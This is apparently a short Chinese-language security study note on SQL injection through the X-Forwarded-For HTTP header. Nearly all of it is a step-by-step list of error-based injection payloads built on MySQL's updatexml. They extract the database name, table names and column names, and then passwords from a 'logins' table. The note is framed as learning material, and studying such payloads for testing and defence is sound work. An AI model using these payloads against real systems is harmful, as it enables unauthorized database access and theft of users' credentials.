网络安全学习笔记——XFF攻击流程

手工注入

手动报错注入,填写格式如:X-Forwarded-For: ' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1

库名

1' and updatexml(1,concat(0x7e,database(),0x7e),1), '

表名

1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)), '

字段/列名

1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='logins' limit 0,1),0x7e),1)), '

具体内容

1' and updatexml(1,concat(0x7e,(select password from logins),0x7e),1)), '

你可能感兴趣的:(数据库,sql,mysql)